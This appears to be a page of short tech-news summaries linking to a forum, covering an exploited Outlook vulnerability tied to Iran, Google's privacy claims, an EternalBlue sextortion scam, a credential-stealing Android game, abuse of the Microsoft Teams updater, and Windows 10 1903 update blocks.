By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy

Less than two weeks ago, U.S. Cyber Command launched an offensive on Iran to disable computer systems used by the country's Revolutionary Guard Corps to control rocket and missile launches. Now, the agency has issued an unprecedented public warning that is has discovered the "active malicious use" of a Microsoft Outlook vulnerability that appears to be linked to Iran. When the U.S. opted for an offensive cyber strike instead of a more conventional missile strike in retaliation for the downing of a U.S. drone, it was painted as a backtrack but, as I reported at the time, it was actually a game changer. If the U.S. has used offensive cyber to compromise Iran's core command and control systems, it completely changes the battlefield dynamic. It was also notable that the U.S. decided to put the cyber strike into the public domain. Iran does not play in the same league as Russia or China when it comes to cyber capabilities. The country's ability to retaliate against the U.S. government is limited. But, for Iran, there are many easier targets. And one of the fears expressed by analysts after the military cyber strike was that Iran might elect to increase its cyber activity in the broader non-governmental sector. And so to this warning, and Cyber Command tweeting that it has discovered the "use of CVE-2017-11774 and recommends immediate patching," adding a disabled link to the suspected delivery URL. The vulnerability was first discovered by Sensepost and patched in 2017—so if an Outlook install has been patched there is no concern. But we all know—and countless press articles have run this year alone—that many systems remain unpatched and vulnerable, opening up entire networks to potential bad actors. The bug essentially opens a door for malicious code to escape from Outlook into the underlying operating system. And, the point at issue here is that this vulnerability has been linked to Iran before.  As reported by ZDNet, the bug was first exposed in 2017, "but by 2018, it had been weaponized by an Iranian state-sponsored hacking group known as APT33 (or Elfin), primarily known for developing the Shamoon disk-wiping malware." For more turn to OUR FORUM.

Google recently generated a flurry of coverage about its supposed privacy pivot, including an op-ed in The New York Times by chief executive Sundar Pichai. “We feel privileged that billions of people trust products like Search, Chrome, Maps, and Android to help them every day,” Pichai wrote. It’s not that we necessarily trust Google. It’s that, as a near monopoly, we have no choice. In fact, the crisis of trust — after a year of data breaches and congressional appearances — has led all the major tech companies to launch public relations campaigns around privacy. This is a smokescreen to satisfy regulators and pacify consumers while continuing their data exploitation activities. While some of the changes they have made are positive, they have no intention to give up their lucrative business model of ads powered by surveillance, which is fundamentally at odds with privacy. There was a time when we had meaningful privacy on the Internet. In the early days, dot-com barons weren’t interested in surveillance and data mining. The business model was subscriptions, led by companies like America Online, which dominated the space. As more users moved away from proprietary portals like America Online toward the open Internet, browsers and search replaced subscriber services as the gateway to the web. Clicks and user data seeded the beginnings of what is now called surveillance capitalism. By the end of the decade, a science project at Stanford was on pace to supplant “search” as a verb. Ironically, Google is an ad-funded doppelganger of the subscriber services it replaced. Instead of charging users for access, it simply spies on their online activity, location history, and behaviors to give advertisers (their true customers) unprecedented power to manipulate consumer behavior. For more navigate to OUR FORUM.

An extortion scam is being distributed that claims a Remote Access Trojan, or RAT, was installed on your computer using the EternalBlue exploit. The scammers then go on to say that they used the RAT to take videos of you on adult web sites and that you must pay a ransom or they will send it to all of your contacts. EternalBlue is an exploit allegedly created by the NSA that targets a vulnerability in the SMBv1 protocol. This vulnerability allows attackers to execute commands on a vulnerable computer that can be used to install malware. The extortion emails being distributed have a subject of "Security Alert. Your account was compromised. Password must be changed" and spins a tale that while visiting a porn site, the EternalBlue exploit was triggered to install a Remote Access Trojan on your computer. This Trojan was then allegedly used to take videos of you, steal your contacts, and your passwords. It goes on to say if you do not pay a $600 extortion demand, the attacker will send your video to all of your contacts. The reality is that this is just a scam and the senders have not utilized any exploits on your computer, there is no RAT installed, and there are no videos of you while using an adult web site. Any passwords or email addresses listed in the email are simply from data breaches where your account info was publicly disclosed. While you now know this is a scam, unfortunately not everyone else does and some people actually pay the extortion demand. Visit OUR FORUM for more.

An Android horror game with over 50,000 installs was found to exhibit malicious behavior, stealing the gamers' Google and Facebook credentials, and siphoning their data after logging into their accounts. The game is called Scary Granny ZOMBYE Mod: The Horror Game 2019 (Scary Granny) and it is designed to bank on the success of another Android game dubbed Granny that currently has over 100 million installs. While Scary Granny is a fully functional game which would actually keep gamers playing it to avoid any suspicion and raising any red flags, it was removed on June 27 from Google's Play Store after the researchers who unearthed its phishing and data siphoning abilities reported it to Google. To hide its actual "horror" side, the game would delay exhibiting any malicious activity for up to two days after being installed as Wandera's research team discovered. The app would also only turn on its data-stealing modules only if it was being used on older Android versions, with users of newer devices running up to date operating systems not being impacted. When being installed, the Scary Granny game gains persistence on the devices by asking for permissions to launch itself after the smartphone or tablet is restarted. This allows it to show full-screen phishing overlays even after the Android users reboot their devices, by first displaying "a notification telling the user to update Google security services. When the user hits ‘update’, a fake Google login page is presented, which is very convincing other than the fact ‘sign in’ is spelled incorrectly." Learn more by visiting OUR FORUM.

The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system. The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers but it can be used only to download a payload. These applications rely on the open source Squirrel project to manage installation and updating routines, which uses NuGet package manager to create the necessary files. Multiple security researchers discovered that using the 'update' command for a vulnerable application it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.' With Microsoft Teams, a payload is added to its folder and executed automatically using certain commands. These commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.  The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts database on GitHub. Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software. Trying to replicate the effect with GitHub, and WhatsApp, and UiPath did not achieve execution for the payload and only downloading it from a remote server was possible. "In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer. If you use Microsoft Teams, you surely want to learn more about this security infraction and visit OUR FORUM.

Some Windows 10 users are seeing notifications from Microsoft that their devices are temporarily blocked from receiving the Windows 10 1903 update. There have been some bugs and issues with Microsoft's Windows 10 May Update/1903 feature update since Microsoft kicked off its rollout in late May. But the 1903 complaint I've gotten most often (so far) is from users who want to install the update but can't and don't know why. Microsoft has added a new notification which some users whose devices aren't ready or able to install the update are seeing when they attempt to proactively grab the 1903 release. As originally noted last week by Windows Latest, Microsoft has added a new message to its Windows Update page. Users attempting to install 1903 on machines with out-of-date drivers or other issues are seeing this message: "The Windows 10 May 2019 Update is on its way. We're offering this update to compatible devices, but your device isn't ready for it. Once your device is ready, you'll see the update available on this page. There's nothing you need to do at this time." I confirmed with Microsoft that this notification is part of its 1903 rollout strategy. "The notification started with the latest changes made to improve the quality/transparency of the Windows update process," according to a Microsoft spokesperson. Microsoft officials said in a blog post on May 21 that the company planned to start automatically updating devices running the April 2018 Update and earlier versions of Windows 10 to Windows 10 1903. Last week, via the Windows Update account on Twitter, Microsoft officials communicated that they were building and training machine-learning rollout processes that would enable this to happen. Details on exactly when and how Microsoft plans to do this are scarce. More information on the automatic-update plan is posted on OUR FORUM.

 

GTranslate